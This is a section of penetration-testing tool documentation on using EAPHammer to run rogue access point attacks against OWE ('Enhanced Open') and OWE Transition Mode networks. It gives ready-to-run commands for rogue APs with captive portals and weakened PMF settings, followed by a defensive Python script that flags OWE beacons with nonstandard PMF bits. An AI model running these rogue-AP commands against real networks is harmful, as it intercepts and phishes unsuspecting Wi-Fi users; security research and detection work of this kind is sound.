XV. Attacking Opportunistic Wireless Encryption
Special thanks to Steve Darracott for his help researching this subject: @thedarracott
EAPHammer supports attacks against networks and clients that are configured to use Opportunistic Wireless Encryption (OWE), which is also known as "Enhanced Open". For a theoretical overview of this subject, please refer to the following blog posts:
- https://posts.specterops.io/war-never-changes-attacks-against-wpa3s-enhanced-open-part-1-how-we-got-here-71f5a80e3be7
- https://posts.specterops.io/war-never-changes-attacks-against-wpa3s-enhanced-open-part-2-understanding-owe-90fdc29126a1
- link to part iii here
tl;dr - OWE is used to provide encryption capabilities to public wireless networks. You can think of OWE like this - OWE is to open networks as HTTPS is to HTTP. However, unlike HTTPS, OWE does not provide any means of authenticating the identity of what you're connecting to (HTTPS uses server certs). This means that it can be compromised using Person-In-the-Middle (PITM) attacks. From an operational standpoint, this means that you can execute rogue AP attacks against OWE in the same way you would against open networks.
To create a rogue access point that uses OWE, just pass the --auth owe flag as shown in the following example:
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal
Note that by default, eaphammer will conform to RFC 8110 by requiring stations to use Protected Management Frames (PMF) when --auth owe is used. You are free to tell eaphammer to violate RFC 8110 by making PMF enabled but not required:
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf enable
Should you wish to commit an even more egregious RFC violation, you can disable PMF completely as well:
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf disable
OWE Transition Mode
EAPHammer also supports attacks against OWE Transition Mode. To create a rogue AP that uses OWE Transition Mode, use the --auth owe-transition flag as shown in the following example:
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal
By default, eaphammer will conform to RFC 8110 by enabling but not requiring PMF when --auth owe-transition is used. You are free to tell eaphammer to violate RFC 8110 by making PMF required:
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf require
Alternatively, you can disable PMF completely:
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf disable
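The --pmf require / enable / disable settings described for both --auth owe and --auth owe-transition above end up as the MFPC and MFPR bits in the RSN element of the AP's beacons, and transition mode additionally advertises a Wi-Fi Alliance OWE Transition Mode vendor element. The following Python script is an added example, not part of EAPHammer, that a defender can use to read those bits out of a beacon's tagged parameters and flag an OWE AP whose PMF posture departs from the RFC 8110 defaults the wiki describes (PMF required for OWE, enabled but not required for transition mode). The element builders and the sample beacons are constructed for the example; the hypothetical BSSID and SSID values carry no meaning.

```python
"""Classify the PMF posture of an OWE beacon from its RSN element.

Added example (not EAPHammer code). Sample elements are constructed inline.
"""
import struct

RSN_EID = 0x30                      # RSN information element ID
VENDOR_EID = 0xDD                   # vendor-specific element ID
IEEE_OUI = bytes.fromhex("000fac")  # 00-0F-AC suite selectors
WFA_OUI = bytes.fromhex("506f9a")   # Wi-Fi Alliance OUI
OWE_TRANSITION_TYPE = 0x1C          # OUI type of the OWE Transition Mode element
CIPHER_CCMP = IEEE_OUI + b"\x04"    # 00-0F-AC:4  CCMP-128
AKM_OWE = IEEE_OUI + b"\x12"        # 00-0F-AC:18 OWE
MFPR, MFPC = 0x0040, 0x0080         # RSN Capabilities: PMF required / PMF capable


def iter_elements(tail: bytes):
    """Walk the tagged-parameter TLVs of a beacon body, yielding (eid, value)."""
    off = 0
    while off + 2 <= len(tail):
        eid, length = tail[off], tail[off + 1]
        value = tail[off + 2: off + 2 + length]
        if len(value) != length:
            raise ValueError("truncated element")
        yield eid, value
        off += 2 + length


def parse_rsn(body: bytes) -> dict:
    """Decode RSN version, group/pairwise ciphers, AKM suites and capabilities."""
    version, = struct.unpack_from("<H", body, 0)
    if version != 1:
        raise ValueError("unsupported RSN version %d" % version)
    off = 2
    group = bytes(body[off:off + 4]); off += 4
    n, = struct.unpack_from("<H", body, off); off += 2
    pairwise = [bytes(body[off + 4 * i: off + 4 * i + 4]) for i in range(n)]; off += 4 * n
    n, = struct.unpack_from("<H", body, off); off += 2
    akms = [bytes(body[off + 4 * i: off + 4 * i + 4]) for i in range(n)]; off += 4 * n
    caps, = struct.unpack_from("<H", body, off)
    return {"group": group, "pairwise": pairwise, "akms": akms, "caps": caps}


def pmf_posture(caps: int) -> str:
    """Map the MFPC/MFPR bits onto the three values eaphammer's --pmf flag takes."""
    if caps & MFPC and caps & MFPR:
        return "require"
    if caps & MFPC:
        return "enable"
    if caps & MFPR:
        raise ValueError("MFPR set without MFPC is not a legal RSN configuration")
    return "disable"


def classify_owe_beacon(tail: bytes) -> dict:
    """Report the OWE mode, advertised PMF posture, and whether it matches the
    RFC 8110 default the wiki describes for that mode."""
    rsn, transition = None, False
    for eid, value in iter_elements(tail):
        if eid == RSN_EID:
            rsn = parse_rsn(value)
        elif eid == VENDOR_EID and value[:4] == WFA_OUI + bytes([OWE_TRANSITION_TYPE]):
            transition = True
    if rsn is None or AKM_OWE not in rsn["akms"]:
        return {"mode": None, "pmf": None, "expected_pmf": None, "conformant": None}
    mode = "owe-transition" if transition else "owe"
    pmf = pmf_posture(rsn["caps"])
    expected = {"owe": "require", "owe-transition": "enable"}[mode]
    return {"mode": mode, "pmf": pmf, "expected_pmf": expected, "conformant": pmf == expected}


def build_rsn(akms, caps: int) -> bytes:
    """Construct an RSN element with CCMP ciphers and the given AKMs/capabilities."""
    body = struct.pack("<H", 1) + CIPHER_CCMP            # version, group cipher
    body += struct.pack("<H", 1) + CIPHER_CCMP           # one pairwise cipher
    body += struct.pack("<H", len(akms)) + b"".join(akms)
    body += struct.pack("<H", caps)
    return bytes([RSN_EID, len(body)]) + body


def build_owe_transition_element(bssid: bytes, ssid: bytes) -> bytes:
    """Construct the OWE Transition Mode element pointing at the paired BSS."""
    body = WFA_OUI + bytes([OWE_TRANSITION_TYPE]) + bssid + bytes([len(ssid)]) + ssid
    return bytes([VENDOR_EID, len(body)]) + body


# Constructed sample beacon tails (hypothetical BSSID and SSID).
OWE_REQUIRED = build_rsn([AKM_OWE], MFPC | MFPR)   # --auth owe default
OWE_OPTIONAL = build_rsn([AKM_OWE], MFPC)          # --auth owe --pmf enable
OWE_NO_PMF = build_rsn([AKM_OWE], 0)               # --auth owe --pmf disable
TRANSITION = build_rsn([AKM_OWE], MFPC) + build_owe_transition_element(
    bytes.fromhex("020000000001"), b"wheresMahCertBrah")  # --auth owe-transition default

if __name__ == "__main__":
    for name, tail in [("owe/require", OWE_REQUIRED), ("owe/enable", OWE_OPTIONAL),
                       ("owe/disable", OWE_NO_PMF), ("transition/enable", TRANSITION)]:
        print(name, classify_owe_beacon(tail))
```

Feed the tagged-parameter portion of a captured beacon frame to classify_owe_beacon(); a result with conformant set to False is a candidate for closer inspection, since a legitimate OWE deployment has little reason to advertise the relaxed PMF settings shown above.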